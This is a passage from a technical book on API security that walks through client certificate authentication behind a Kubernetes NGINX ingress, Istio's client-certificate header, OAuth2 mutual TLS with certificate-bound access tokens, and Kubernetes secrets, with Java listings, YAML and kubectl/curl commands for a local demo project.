a trusted CA.
To enable client certificate authentication in the Kubernetes ingress controller, you
can add annotations to the ingress resource definition in the Natter project. Table 11.1
shows the annotations that can be used.
Table 11.1 Kubernetes NGINX ingress controller annotations for client certificate authentication

nginx.ingress.kubernetes.io/auth-tls-verify-client (on, off, optional, or optional_no_ca)
    Enables or disables client certificate authentication. If on, then a client certificate is required. The optional value requests a certificate and verifies it if the client presents one. The optional_no_ca option prompts the client for a certificate but doesn’t verify it.
nginx.ingress.kubernetes.io/auth-tls-secret (the name of a Kubernetes secret in the form namespace/secret-name)
    The secret contains the set of trusted CAs to verify the client certificate against.
nginx.ingress.kubernetes.io/auth-tls-verify-depth (a positive integer)
    The maximum number of intermediate CA certificates allowed in the client’s certificate chain.
nginx.ingress.kubernetes.io/auth-tls-pass-certificate-to-upstream (true or false)
    If enabled, the client’s certificate will be made available in the ssl-client-cert HTTP header to servers behind the ingress.
nginx.ingress.kubernetes.io/auth-tls-error-page (a URL)
    If certificate authentication fails, the client will be redirected to this error page.
NOTE All annotation values must be contained in double quotes, even if they are not strings. For example, you must use nginx.ingress.kubernetes.io/auth-tls-verify-depth: "1" to specify a maximum chain length of 1.
To create the secret with the trusted CA certificates to verify any client certificates, you create a generic secret passing in a PEM-encoded certificate file. You can include multiple root CA certificates in the file by simply listing them one after the other. For the examples in this chapter, you can use client certificates generated by the mkcert utility that you’ve used since chapter 2. The root CA certificate for mkcert is installed into its CAROOT directory, which you can determine by running

mkcert -CAROOT
which will produce output like the following:
/Users/neil/Library/Application Support/mkcert
To import this root CA as a Kubernetes secret in the correct format, run the following
command:
kubectl create secret generic ca-secret -n natter-api \
--from-file=ca.crt="$(mkcert -CAROOT)/rootCA.pem"
Listing 11.5 shows an updated ingress configuration with support for optional client certificate authentication. Client verification is set to optional, so that the API can support service clients using certificate authentication and users performing password authentication. The TLS secret for the trusted CA certificates is set to natter-api/ca-secret to match the secret you just created within the natter-api namespace. Finally, you can enable passing the certificate to upstream hosts so that you can extract the client identity from the certificate. Navigate to the kubernetes folder under the Natter API project and update the natter-ingress.yaml file to add the new annotations shown in bold in the following listing.
Listing 11.5 Ingress with optional client certificate authentication

apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: api-ingress
  namespace: natter-api
  annotations:
    nginx.ingress.kubernetes.io/upstream-vhost:
      "$service_name.$namespace.svc.cluster.local:$service_port"
    # Annotations to allow optional client certificate authentication
    nginx.ingress.kubernetes.io/auth-tls-verify-client: "optional"
    nginx.ingress.kubernetes.io/auth-tls-secret: "natter-api/ca-secret"
    nginx.ingress.kubernetes.io/auth-tls-verify-depth: "1"
    nginx.ingress.kubernetes.io/auth-tls-pass-certificate-to-upstream: "true"
spec:
  tls:
    - hosts:
        - api.natter.local
      secretName: natter-tls
  rules:
    - host: api.natter.local
      http:
        paths:
          - backend:
              serviceName: natter-api-service
              servicePort: 4567
If you still have Minikube running from chapter 10, you can now update the ingress
definition by running:
kubectl apply -f kubernetes/natter-ingress.yaml
TIP If changes to the ingress controller don’t seem to be working, check the output of kubectl describe ingress -n natter-api to ensure the annotations are correct. For further troubleshooting tips, check the official documentation at http://mng.bz/X0rG.
11.4.3 Verifying client identity
The verification performed by NGINX is limited to checking that the client provided a certificate that was signed by one of the trusted CAs, and that any constraints specified in the certificates themselves are satisfied, such as the expiry time of the certificate. To verify the identity of the client and apply appropriate permissions, the ingress controller sets several HTTP headers that you can use to check details of the client certificate, shown in table 11.2.
Table 11.2 HTTP headers set by NGINX

ssl-client-verify
    Indicates whether a client certificate was presented and, if so, whether it was verified. The possible values are NONE to indicate no certificate was supplied, SUCCESS if a certificate was presented and is valid, or FAILURE:<reason> if a certificate was supplied but is invalid or not signed by a trusted CA.
ssl-client-subject-dn
    The Subject Distinguished Name (DN) field of the certificate if one was supplied.
ssl-client-issuer-dn
    The Issuer DN, which will match the Subject DN of the CA certificate.
ssl-client-cert
    If auth-tls-pass-certificate-to-upstream is enabled, then this will contain the full client certificate in URL-encoded PEM format.
Figure 11.5 shows the overall process. The NGINX ingress controller terminates the client’s TLS connection and verifies the client certificate during the TLS handshake. After the client has authenticated, the ingress controller forwards the request to the backend service and includes the verified client certificate in the ssl-client-cert header.
Figure 11.5 To allow client certificate authentication by external clients, you configure the NGINX ingress controller to request and verify the client certificate during the TLS handshake. NGINX then forwards the client certificate in the ssl-client-cert HTTP header.
The mkcert utility that you’ll use for development in this chapter sets the client name that you specify as a Subject Alternative Name (SAN) extension on the certificate rather than using the Subject DN field. Because NGINX doesn’t expose SAN values directly in a header, you’ll need to parse the full certificate to extract it. Listing 11.6 shows how to parse the header supplied by NGINX into a java.security.cert.X509Certificate object using a CertificateFactory, from which you can then extract the client identifier from the SAN. Open the UserController.java file and add the new method from listing 11.6. You’ll also need to add the following import statements to the top of the file:

import java.io.ByteArrayInputStream;
import java.net.URLDecoder;
import java.security.cert.*;
Listing 11.6 Parsing a certificate

public static X509Certificate decodeCert(String encodedCert) {
    var pem = URLDecoder.decode(encodedCert, UTF_8);    // Decode the URL-encoding added by NGINX.
    try (var in = new ByteArrayInputStream(pem.getBytes(UTF_8))) {
        var certFactory = CertificateFactory.getInstance("X.509");    // Parse the PEM-encoded certificate
        return (X509Certificate) certFactory.generateCertificate(in); //   using a CertificateFactory.
    } catch (Exception e) {
        throw new RuntimeException(e);
    }
}
There can be multiple SAN entries in a certificate and each entry can have a different type. Mkcert uses the DNS type, so the code looks for the first DNS SAN entry and returns that as the name. Java returns the SAN entries as a collection of two-element List objects, the first of which is the type (as an integer) and the second is the actual value (either a String or a byte array, depending on the type). DNS entries have type value 2. If the certificate contains a matching entry, you can set the client ID as the subject attribute on the request, just as you’ve done when authenticating users. Because the trusted CA issues client certificates, you can instruct the CA not to issue a certificate that clashes with the name of an existing user. Open the UserController.java file again and add the new constant and method definition from the following listing.
Listing 11.7 Parsing a client certificate

private static final int DNS_TYPE = 2;

void processClientCertificateAuth(Request request) {
    var pem = request.headers("ssl-client-cert");    // Extract the client certificate
    var cert = decodeCert(pem);                      //   from the header and decode it.
    try {
        if (cert.getSubjectAlternativeNames() == null) {
            return;
        }
        for (var san : cert.getSubjectAlternativeNames()) {
            if ((Integer) san.get(0) == DNS_TYPE) {      // Find the first SAN entry with DNS type.
                var subject = (String) san.get(1);
                request.attribute("subject", subject);   // Set the service account identity
                return;                                  //   as the subject of the request.
            }
        }
    } catch (CertificateParsingException e) {
        throw new RuntimeException(e);
    }
}
To allow a service account to authenticate using a client certificate instead of username
and password, you can add a case to the UserController authenticate method that
checks if a client certificate was supplied. You should only trust the certificate if the
ingress controller could verify it. As mentioned in table 11.2, NGINX sets the header
ssl-client-verify to the value SUCCESS if the certificate was valid and signed by a
trusted CA, so you can use this to decide whether to trust the client certificate.
WARNING If a client can set their own ssl-client-verify and ssl-client-cert headers, they can bypass the certificate authentication. You should test that your ingress controller strips these headers from any incoming requests. If your ingress controller supports using custom header names, you can reduce the risk by adding a random string to them, such as ssl-client-cert-zOAGY18FHbAAljJV. This makes it harder for an attacker to guess the correct header names even if the ingress is accidentally misconfigured.
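As a defense in depth, you could also reject suspicious requests on the API side. The following is a hedged sketch of a Spark before-filter; isFromTrustedIngress is a hypothetical helper you would implement for your own network layout, and this is not a substitute for configuring the ingress to strip the headers:

before((request, response) -> {
    if (request.headers("ssl-client-cert") != null
            && !isFromTrustedIngress(request.ip())) {    // hypothetical helper method
        halt(403, "certificate headers from untrusted source");
    }
});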
You can now enable client certificate authentication by updating the authenticate
method to check for a valid client certificate and extract the subject identifier from
that instead. Listing 11.8 shows the changes required. Open the UserController.java
file again, add the lines highlighted in bold from the listing to the authenticate
method and save your changes.
Listing 11.8 Enabling client certificate authentication

public void authenticate(Request request, Response response) {
    if ("SUCCESS".equals(request.headers("ssl-client-verify"))) {
        processClientCertificateAuth(request);   // If certificate authentication was successful,
        return;                                  //   then use the supplied certificate.
    }

    var credentials = getCredentials(request);   // Otherwise, use the existing
    if (credentials == null) return;             //   password-based authentication.

    var username = credentials[0];
    var password = credentials[1];

    var hash = database.findOptional(String.class,
            "SELECT pw_hash FROM users WHERE user_id = ?", username);
    if (hash.isPresent() && SCryptUtil.check(password, hash.get())) {
        request.attribute("subject", username);
        var groups = database.findAll(String.class,
                "SELECT DISTINCT group_id FROM group_members " +
                "WHERE user_id = ?", username);
        request.attribute("groups", groups);
    }
}
You can now rebuild the Natter API service by running
eval $(minikube docker-env)
mvn clean compile jib:dockerBuild
in the root directory of the Natter project. Then restart the Natter API and database
to pick up the changes,3 by running:
kubectl rollout restart deployment \
natter-api-deployment natter-database-deployment -n natter-api
After the pods have restarted (using kubectl get pods -n natter-api to check), you
can register a new service user as if it were a regular user account:
curl -H 'Content-Type: application/json' \
-d '{"username":"testservice","password":"password"}' \
https://api.natter.local/users
3 The database must be restarted because the Natter API tries to recreate the schema on startup and will throw an exception if it already exists.
Mini project

You still need to supply a dummy password to create the service account, and somebody could log in using that password if it’s weak. Update the UserController registerUser method (and database schema) to allow the password to be missing, in which case password authentication is disabled. The GitHub repository accompanying the book has a solution in the chapter11-end branch.
You can now use mkcert to generate a client certificate for this account, signed by the mkcert root CA that you imported as the ca-secret. Use the -client option to mkcert to generate a client certificate and specify the service account username:

mkcert -client testservice

This will generate a new certificate for client authentication in the file testservice-client.pem, with the corresponding private key in testservice-client-key.pem. You can now log in using the client certificate to obtain a session token, using the --key option to specify the private key and --cert to supply the certificate:
curl -H 'Content-Type: application/json' -d '{}' \
--key testservice-client-key.pem \
--cert testservice-client.pem \
https://api.natter.local/sessions
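If your service client is written in Java, a rough equivalent is to configure an SSLContext with the client key pair. This sketch assumes you have converted the mkcert PEM files into a PKCS#12 keystore named client.p12 with the password changeit (both assumptions), and imports of javax.net.ssl.KeyManagerFactory and javax.net.ssl.SSLContext:

var clientKeys = KeyStore.getInstance("PKCS12");
clientKeys.load(new FileInputStream("client.p12"), "changeit".toCharArray());
var kmf = KeyManagerFactory.getInstance(KeyManagerFactory.getDefaultAlgorithm());
kmf.init(clientKeys, "changeit".toCharArray());
var sslContext = SSLContext.getInstance("TLS");
sslContext.init(kmf.getKeyManagers(), null, null);   // default trust managers
var httpClient = HttpClient.newBuilder()
        .sslContext(sslContext)                      // presents the client certificate during the handshake
        .build();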
Because TLS certificate authentication effectively authenticates every request sent in the same TLS session, it can be more efficient for a client to reuse the same TLS session for many HTTP API requests. In this case, you can do without token-based authentication and just use the certificate.
Pop quiz

7 Which one of the following headers is used by the NGINX ingress controller to indicate whether client certificate authentication was successful?
   a  ssl-client-cert
   b  ssl-client-verify
   c  ssl-client-issuer-dn
   d  ssl-client-subject-dn
   e  ssl-client-naughty-or-nice

The answer is at the end of the chapter.
11.4.4 Using a service mesh
Although TLS certificate authentication is very secure, client certificates still must be generated and distributed to clients, and periodically renewed when they expire. If the private key associated with a certificate might be compromised, then you also need to have processes for handling revocation or use short-lived certificates. These are the same problems discussed in chapter 10 for server certificates, which is one of the reasons that you installed a service mesh to automate handling of TLS configuration within the network in section 10.3.2.
To support network authorization policies, most service mesh implementations already implement mutual TLS and distribute both server and client certificates to the service mesh proxies. Whenever an API request is made between a client and a server within the service mesh, that request is transparently upgraded to mutual TLS by the
proxies and both ends authenticate to each other with TLS certificates. This raises the possibility of using the service mesh to authenticate service clients to the API itself. For this to work, the service mesh proxy would need to forward the client certificate details from the sidecar proxy to the underlying service as an HTTP header, just like you’ve configured the ingress controller to do. Istio supports this by default since the 1.1.0 release, using the X-Forwarded-Client-Cert header, but Linkerd currently doesn’t have this feature.
Unlike NGINX, which uses separate headers for different fields extracted from
the client certificate, Istio combines the fields into a single header like the following
example:4
x-forwarded-client-cert: By=http://frontend.lyft.com;Hash=
➥ 468ed33be74eee6556d90c0149c1309e9ba61d6425303443c0748a
➥ 02dd8de688;Subject="CN=Test Client,OU=Lyft,L=San
➥ Francisco,ST=CA,C=US"
The fields for a single certificate are separated by semicolons, as in the example. The
valid fields are given in table 11.3.
Table 11.3  Istio X-Forwarded-Client-Cert fields

Field     Description
By        The URI of the proxy that is forwarding the client details.
Hash      A hex-encoded SHA-256 hash of the full client certificate.
Cert      The client certificate in URL-encoded PEM format.
Chain     The full client certificate chain, in URL-encoded PEM format.
Subject   The Subject DN field as a double-quoted string.
URI       Any URI-type SAN entries from the client certificate. This field may be repeated if there are multiple entries.
DNS       Any DNS-type SAN entries. This field can be repeated if there's more than one matching SAN entry.

The behavior of Istio when setting this header is not configurable and depends on the version of Istio being used. The latest version sets the By, Hash, Subject, URI, and DNS fields when they are present in the client certificate used by the Istio sidecar proxy for mTLS. Istio's own certificates use a URI SAN entry to identify clients and servers, using a standard called SPIFFE (Secure Production Identity Framework for Everyone), which provides a way to name services in microservices environments. Figure 11.6 shows the components of a SPIFFE identifier, which consists of a trust domain and a path. In Istio, the workload identifier consists of the Kubernetes namespace and service account. SPIFFE allows Kubernetes services to be given stable IDs that can be included in a certificate without having to publish DNS entries for each one; Istio can use its knowledge of Kubernetes metadata to ensure that the SPIFFE ID matches the service a client is connecting to.

spiffe://k8s.example.com/ns/natter-api/sa/natter-db
[trust domain: k8s.example.com; workload identifier: ns/natter-api/sa/natter-db (namespace + service account)]

Figure 11.6  A SPIFFE identifier consists of a trust domain and a workload identifier. In Istio, the workload identifier is made up of the namespace and service account of the service.

4 The Istio sidecar proxy is based on Envoy, which is developed by Lyft, in case you're wondering about the examples!
DEFINITION
SPIFFE stands for Secure Production Identity Framework for Everyone
and is a standard URI for identifying services and workloads running in a clus-
ter. See https://spiffe.io for more information.
NOTE
Istio identities are based on Kubernetes service accounts, which are dis-
tinct from services. By default, there is only a single service account in each
namespace, shared by all pods in that namespace. See http://mng.bz/yrJG
for instructions on how to create separate service accounts and associate them
with your pods.
Istio also has its own version of Kubernetes’ ingress controller, in the form of the Istio
Gateway. The gateway allows external traffic into the service mesh and can also be con-
figured to process egress traffic leaving the service mesh.5 The gateway can also be
configured to accept TLS client certificates from external clients, in which case it
will also set the X-Forwarded-Client-Cert header (and strip it from any incoming
requests). The gateway sets the same fields as the Istio sidecar proxies, but also sets
the Cert field with the full encoded certificate.
Because a request may pass through multiple Istio sidecar proxies as it is being pro-
cessed, there may be more than one client certificate involved. For example, an exter-
nal client might make a HTTPS request to the Istio Gateway using a client certificate,
and this request then gets forwarded to a microservice over Istio mTLS. In this case,
the Istio sidecar proxy’s certificate would overwrite the certificate presented by the
real client and the microservice would only ever see the identity of the gateway in
the X-Forwarded-Client-Cert header. To solve this problem, Istio sidecar proxies
don’t replace the header but instead append the new certificate details to the existing
header, separated by a comma. The microservice would then see a header with multi-
ple certificate details in it, as in the following example:
X-Forwarded-Client-Cert: By=https://gateway.example.org;
➥ Hash=0d352f0688d3a686e56a72852a217ae461a594ef22e54cb
➥ 551af5ca6d70951bc,By=spiffe://api.natter.local/ns/
➥ natter-api/sa/natter-api-service;Hash=b26f1f3a5408f7
➥ 61753f3c3136b472f35563e6dc32fefd1ef97d267c43bcfdd1

5 The Istio Gateway is not just a Kubernetes ingress controller. An Istio service mesh may involve only part of a Kubernetes cluster, or may span multiple Kubernetes clusters, while a Kubernetes ingress controller always deals with external traffic coming into a single cluster.
The original client certificate presented to the gateway is the first entry in the header,
and the certificate presented by the Istio sidecar proxy is the second. The gateway
itself will strip any existing header from incoming requests, so the append behavior is
only for internal sidecar proxies. The sidecar proxies also strip the header from new
outgoing requests that originate inside the service mesh. These features allow you to
use client certificate authentication in Istio without needing to generate or manage
your own certificates. Within the service mesh, this is entirely managed by Istio, while
external clients can be issued with certificates using an external CA.
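To make this concrete, a minimal sketch of extracting the Hash field of the first certificate entry from the header might look like the following (a hypothetical helper, not part of the Natter codebase; note that a naive split like this breaks if quoted values such as Subject contain commas or semicolons, so a real parser must honor the quoting rules):

// Extract the Hash field of the first (external client) entry.
static String firstClientCertHash(String xfcc) {
    var firstEntry = xfcc.split(",", 2)[0];       // entries are comma-separated
    for (var field : firstEntry.split(";")) {     // fields are semicolon-separated
        var parts = field.split("=", 2);
        if (parts.length == 2 && "Hash".equalsIgnoreCase(parts[0])) {
            return parts[1];
        }
    }
    return null;                                  // no Hash field present
}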
11.4.5 Mutual TLS with OAuth2
OAuth2 can also support mTLS for client authentication through a new specification
(RFC 8705 https://tools.ietf.org/html/rfc8705), which also adds support for certifi-
cate-bound access tokens, discussed in section 11.4.6. When used for client authenti-
cation, there are two modes that can be used:
- In self-signed certificate authentication, the client registers a certificate with the AS that is signed by its own private key and not by a CA. The client authenticates to the token endpoint with its client certificate and the AS checks that it exactly matches the certificate stored on the client's profile. To allow the certificate to be updated, the AS can retrieve the certificate as the x5c claim on a JWK from an HTTPS URL registered for the client.
- In the PKI (public key infrastructure) method, the AS establishes trust in the client's certificate through one or more trusted CA certificates. This allows the client's certificate to be issued and reissued independently without needing to update the AS. The client identity is matched to the certificate either through the Subject DN or SAN fields in the certificate.
Unlike JWT bearer authentication, there is no way to use mTLS to obtain an access
token for a service account, but a client can get an access token using the client cre-
dentials grant. For example, the following curl command can be used to obtain an
access token from an AS that supports mTLS client authentication:
# Authenticate using the client certificate and private key;
# the client_id must be specified explicitly.
curl -d 'grant_type=client_credentials&scope=create_space' \
  -d 'client_id=test' \
  --cert test-client.pem \
  --key test-client-key.pem \
  https://as.example.org/oauth2/access_token
The client_id parameter must be explicitly specified when using mTLS client authen-
tication, so that the AS can determine the valid certificates for that client if using the
self-signed method.
Alternatively, the client can use mTLS client authentication in combination with
the JWT Bearer grant type of section 11.3.2 to obtain an access token for a service
account while authenticating itself using the client certificate, as in the following curl
example, which assumes that the JWT assertion has already been created and signed
in the variable $JWT:
# The JWT bearer assertion authorizes access for the service account,
# while mTLS (--cert/--key) authenticates the client itself.
curl \
  -d 'grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer' \
  -d "assertion=$JWT&scope=a+b+c&client_id=test" \
  --cert test-client.pem \
  --key test-client-key.pem \
  https://as.example.org/oauth2/access_token
The combination of mTLS and JWT bearer authentication is very powerful, as you’ll
see later in section 11.5.3.
11.4.6 Certificate-bound access tokens

Beyond supporting client authentication, the OAuth2 mTLS specification also describes how the AS can optionally bind an access token to the TLS client certificate when it is issued, creating a certificate-bound access token. The access token can then be used to access an API only when the client authenticates to the API using the same client certificate and private key. This makes the access token no longer a simple bearer token, because an attacker that steals the token can't use it without the associated private key (which never leaves the client).
DEFINITION
A certificate-bound access token can’t be used except over a TLS con-
nection that has been authenticated with the same client certificate used
when the access token was issued.
Proof-of-possession tokens
Certificate-bound access tokens are an example of proof-of-possession (PoP) tokens, also known as holder-of-key tokens, in which the token can't be used unless the client proves possession of an associated secret key. OAuth 1 supported PoP tokens using HMAC request signing, but the complexity of implementing this correctly was a factor in the feature being dropped in the initial version of OAuth2. Several attempts have been made to revive the idea, but so far, certificate-bound tokens are the only proposal to have become a standard.
Although certificate-bound access tokens are great when you have a working PKI, they can be difficult to deploy in some cases. They work poorly in single-page apps and other web applications. Alternative PoP schemes are being discussed, such as a JWT-based scheme known as DPoP (https://tools.ietf.org/html/draft-fett-oauth-dpop-03), but these are yet to achieve widespread adoption.

To obtain a certificate-bound access token, the client simply authenticates to the token endpoint with the client certificate when obtaining an access token. If the AS
supports the feature, then it will associate a SHA-256 hash of the client certificate with
the access token. The API receiving an access token from a client can check for a cer-
tificate binding in one of two ways:
- If using the token introspection endpoint (section 7.4.1 of chapter 7), the AS will return a new field of the form "cnf": { "x5t#S256": "…hash…" }, where the hash is the Base64url-encoded certificate hash. The cnf claim communicates a confirmation key, and the x5t#S256 part is the confirmation method being used.
- If the token is a JWT, then the same information will be included in the JWT claims set as a "cnf" claim with the same format.
DEFINITION
A confirmation key communicates to the API how it can verify a
constraint on who can use an access token. The client must confirm that it has
access to the corresponding private key using the indicated confirmation
method. For certificate-bound access tokens, the confirmation key is a SHA-256
hash of the client certificate and the client confirms possession of the private
key by authenticating TLS connections to the API with the same certificate.
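For illustration, an introspection response for a certificate-bound token might look like the following (a hypothetical, abbreviated example; the hash value is not real):

{
  "active": true,
  "sub": "testservice",
  "scope": "create_space",
  "cnf": { "x5t#S256": "Ro7TO-dO7mVW2QwBScEwnpuh1kJTA0Q8B0igLdjeaIg" }
}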
Figure 11.7 shows the process by which an API enforces a certificate-bound access
token using token introspection. When the client accesses the API, it presents its
access token as normal. The API introspects the token by calling the AS token intro-
spection endpoint (chapter 7), which will return the cnf claim along with the other
token details. The API can then compare the hash value in this claim to the client cer-
tificate associated with the TLS session from the client.
In both cases, the API can check that the client has authenticated with the same
certificate by comparing the hash with the client certificate used to authenticate at the
TLS layer. Listing 11.9 shows how to calculate the hash of the certificate, known as a
thumbprint in the JOSE specifications, using the java.security.MessageDigest class
that you used in chapter 4. The hash should be calculated over the full binary encod-
ing of the certificate, which is what the certificate.getEncoded() method returns.
Open the OAuth2TokenStore.java file in your editor and add the thumbprint method
from the listing.
DEFINITION
A certificate thumbprint or fingerprint is a cryptographic hash of
the encoded bytes of the certificate.
Listing 11.9  Calculating a certificate thumbprint

private byte[] thumbprint(X509Certificate certificate) {
    try {
        // Use a SHA-256 MessageDigest instance.
        var sha256 = MessageDigest.getInstance("SHA-256");
        // Hash the bytes of the entire certificate.
        return sha256.digest(certificate.getEncoded());
    } catch (Exception e) {
        throw new RuntimeException(e);
    }
}
To enforce a certificate binding on an access token, you need to check the token introspection response for a cnf field containing a confirmation key. The confirmation key is a JSON object whose fields are the confirmation methods and whose values are determined by each method. Loop through the required confirmation methods as shown in listing 11.10 to ensure that they are all satisfied. If any aren't satisfied, or your API doesn't understand any of the confirmation methods, then you should reject the request so that a client can't access your API without all constraints being respected.
TIP
The JWT specification for confirmation methods (RFC 7800, https://tools
.ietf.org/html/rfc7800) requires only a single confirmation method to be
specified. For robustness, you should check for other confirmation methods
and reject the request if there are any that your API doesn’t understand.
[Figure 11.7 diagram: (1) the client obtains a certificate-bound access token from the AS; (2) the client accesses the API; (3) the API introspects the token with the AS, and the response includes {"cnf": {"x5t#S256": "..."}}; (4) the API checks that the client certificate used on the connection matches the certificate binding.]

Figure 11.7  When a client obtains a certificate-bound access token and then uses it to access an API, the API can discover the certificate binding using token introspection. The introspection response will contain a "cnf" claim containing a hash of the client certificate. The API can then compare the hash to the certificate the client has used to authenticate the TLS connection to the API and reject the request if it is different.

Listing 11.10 shows how to enforce a certificate-bound access token constraint by checking for an x5t#S256 confirmation method. If a match is found, Base64url-decode the
confirmation key value to obtain the expected hash of the client certificate. This can
then be compared against the hash of the actual certificate the client has used to
authenticate to the API. In this example, the API is running behind the NGINX ingress
controller, so the certificate is extracted from the ssl-client-cert header.
CAUTION
Remember to check the ssl-client-verify header to ensure
the certificate authentication succeeded; otherwise, you shouldn’t trust the
certificate.
If the client had directly connected to the Java API server, then the certificate is available through a request attribute:

var cert = (X509Certificate) request.attribute(
    "javax.servlet.request.X509Certificate");
You can reuse the decodeCert method from the UserController to decode the certif-
icate from the header and then compare the hash from the confirmation key to the
certificate thumbprint using the MessageDigest.isEqual method. Open the OAuth2-
TokenStore.java file and update the processResponse method to enforce certificate-
bound access tokens as shown in the following listing.
Listing 11.10  Verifying a certificate-bound access token

private Optional<Token> processResponse(JSONObject response,
        Request originalRequest) {
    var expiry = Instant.ofEpochSecond(response.getLong("exp"));
    var subject = response.getString("sub");

    // Check if a confirmation key is associated with the token.
    var confirmationKey = response.optJSONObject("cnf");
    if (confirmationKey != null) {
        // Loop through the confirmation methods to ensure all are satisfied.
        for (var method : confirmationKey.keySet()) {
            // If there are any unrecognized confirmation methods,
            // then reject the request.
            if (!"x5t#S256".equals(method)) {
                throw new RuntimeException(
                        "Unknown confirmation method: " + method);
            }
            // Reject the request if no valid certificate is provided.
            if (!"SUCCESS".equals(
                    originalRequest.headers("ssl-client-verify"))) {
                return Optional.empty();
            }
            // Extract the expected hash from the confirmation key.
            var expectedHash = Base64url.decode(
                    confirmationKey.getString(method));
            // Decode the client certificate and compare the hash,
            // rejecting if they don't match.
            var cert = UserController.decodeCert(
                    originalRequest.headers("ssl-client-cert"));
            var certHash = thumbprint(cert);
            if (!MessageDigest.isEqual(expectedHash, certHash)) {
                return Optional.empty();
            }
        }
    }
    var token = new Token(expiry, subject);
token.attributes.put("scope", response.getString("scope"));
token.attributes.put("client_id",
response.optString("client_id"));
return Optional.of(token);
}
An important point to note is that an API can verify a certificate-bound access token
purely by comparing the hash values, and doesn’t need to validate certificate chains,
check basic constraints, or even parse the certificate at all!6 This is because the author-
ity to perform the API operation comes from the access token and the certificate is
being used only to prevent that token being stolen and used by a malicious client.
This significantly reduces the complexity of supporting client certificate authentica-
tion for API developers. Correctly validating an X.509 certificate is difficult and has
historically been a source of many vulnerabilities. You can disable CA verification at
the ingress controller by using the optional_no_ca option discussed in section 11.4.2,
because the security of certificate-bound access tokens depends only on the client
using the same certificate to access an API that it used when the token was issued,
regardless of who issued that certificate.
TIP
The client can even use a self-signed certificate that it generates just
before calling the token endpoint, eliminating the need for a CA for issuing
client certificates.
At the time of writing, only a few AS vendors support certificate-bound access tokens,
but it’s likely this will increase as the standard has been widely adopted in the financial
sector. Appendix A has instructions on installing an evaluation version of ForgeRock
Access Management 6.5.2, which supports the standard.
6 The code in listing 11.10 does parse the certificate as a side effect of decoding the header with a CertificateFactory, but you could avoid this if you wanted to.
Certificate-bound tokens and public clients
An interesting aspect of the OAuth2 mTLS specification is that a client can request
certificate-bound access tokens even if they don’t use mTLS for client authentication.
In fact, even a public client with no credentials at all can request certificate-bound
tokens! This can be very useful for upgrading the security of public clients. For exam-
ple, a mobile app is a public client because anybody who downloads the app could
decompile it and extract any credentials embedded in it. However, many mobile
phones now come with secure storage in the hardware of the phone. An app can gen-
erate a private key and self-signed certificate in this secure storage when it first
starts up and then present this certificate to the AS when it obtains an access token
to bind that token to its private key. The APIs that the mobile app then accesses with
the token can verify the certificate binding based purely on the hash associated with
the token, without the client needing to obtain a CA-signed certificate.
Pop quiz
8  Which of the following checks must an API perform to enforce a certificate-bound access token? Choose all essential checks.
   a  Check the certificate has not expired.
   b  Ensure the certificate has not expired.
   c  Check basic constraints in the certificate.
   d  Check the certificate has not been revoked.
   e  Verify that the certificate was issued by a trusted CA.
   f  Compare the x5t#S256 confirmation key to the SHA-256 of the certificate the client used when connecting.
9  True or False: A client can obtain certificate-bound access tokens only if it also uses the certificate for client authentication.
The answers are at the end of the chapter.

11.5 Managing service credentials

Whether you use client secrets, JWT bearer tokens, or TLS client certificates, the client will need access to some credentials to authenticate to other services or to retrieve an access token to use for service-to-service calls. In this section, you'll learn how to distribute credentials to clients securely. The process of distributing, rotating, and revoking credentials for service clients is known as secrets management. Where the secrets are cryptographic keys, it is alternatively known as key management.

DEFINITION  Secrets management is the process of creating, distributing, rotating, and revoking credentials needed by services to access other services. Key management refers to secrets management where the secrets are cryptographic keys.

11.5.1 Kubernetes secrets

You've already used Kubernetes' own secrets management mechanism in chapter 10, known simply as secrets. Like other resources in Kubernetes, secrets have a name and live in a namespace, alongside pods and services. Each named secret can have any number of named secret values. For example, you might have a secret for database credentials containing a username and password as separate fields, as shown in listing 11.11. Just like other resources in Kubernetes, they can be created from YAML configuration files. The secret values are Base64-encoded, allowing arbitrary binary data to be included. These values were created using the UNIX echo and Base64 commands:

echo -n 'dbuser' | base64

TIP  Remember to use the -n option to the echo command to avoid an extra newline character being added to your secrets.
WARNING
Base64 encoding is not encryption. Don’t check secrets YAML files
directly into a source code repository or other location where they can be eas-
ily read.
Listing 11.11  Kubernetes secret example

apiVersion: v1
kind: Secret              # The kind field indicates this is a secret.
metadata:
  name: db-password       # Give the secret a name and a namespace.
  namespace: natter-api
type: Opaque
data:                     # The secret has two fields with Base64-encoded values.
  username: ZGJ1c2Vy
  password: c2VrcmV0
You can also define secrets at runtime using kubectl. Run the following command to
define a secret for the Natter API database username and password:
kubectl create secret generic db-password -n natter-api \
--from-literal=username=natter \
--from-literal=password=password
TIP
Kubernetes can also create secrets from files using the --from-file
=username.txt syntax. This avoids credentials being visible in the history of
your terminal shell. The secret will have a field named username.txt with the
binary contents of the file.
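For example (a sketch; db-creds is a hypothetical secret name, and the field name defaults to the file name):

echo -n 'natter' > username.txt
kubectl create secret generic db-creds -n natter-api \
  --from-file=username.txt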
Kubernetes defines three types of secrets:

- The most general are generic secrets, which are arbitrary sets of key-value pairs, such as the username and password fields in listing 11.11 and in the previous example. Kubernetes performs no special processing of these secrets and just makes them available to your pods.
- A TLS secret consists of a PEM-encoded certificate chain along with a private key. You used a TLS secret in chapter 10 to provide the server certificate and key to the Kubernetes ingress controller. Use kubectl create secret tls to create a TLS secret (see the example after this list).
- A Docker registry secret is used to give Kubernetes credentials to access a private Docker container registry. You'd use this if your organization stores all images in a private registry rather than pushing them to a public registry like Docker Hub. Use kubectl create secret docker-registry.
For your own application-specific secrets, you should use the generic secret type.
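For example, a TLS secret could be created like this (a sketch; the secret name and file paths are placeholders):

kubectl create secret tls example-tls -n natter-api \
  --cert=tls.crt --key=tls.key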
Once you’ve defined a secret, you can make it available to your pods in one of
two ways:
As files mounted in the filesystem inside your pods. For example, if you mounted
the secret defined in listing 11.11 under the path /etc/secrets/db, then you
Listing 11.11
Kubernetes secret example
The kind field indicates
this is a secret.
Give the secret a name
and a namespace.
The secret has two fields with
Base64-encoded values.
417
Managing service credentials
would end up with two files inside your pod: /etc/secrets/db/username and
/etc/secrets/db/password. Your application can then read these files to get
the secret values. The contents of the files will be the raw secret values, not the
Base64-encoded ones stored in the YAML.
As environment variables that are passed to your container processes when they
first run. In Java you can then access these through the System.getenv(String
name) method call.
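For example, a container spec can pull a single field of the db-password secret into an environment variable like this (a sketch of the standard Kubernetes mechanism; the variable name DB_PASSWORD is just an example):

env:
  - name: DB_PASSWORD
    valueFrom:
      secretKeyRef:
        name: db-password
        key: password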
TIP
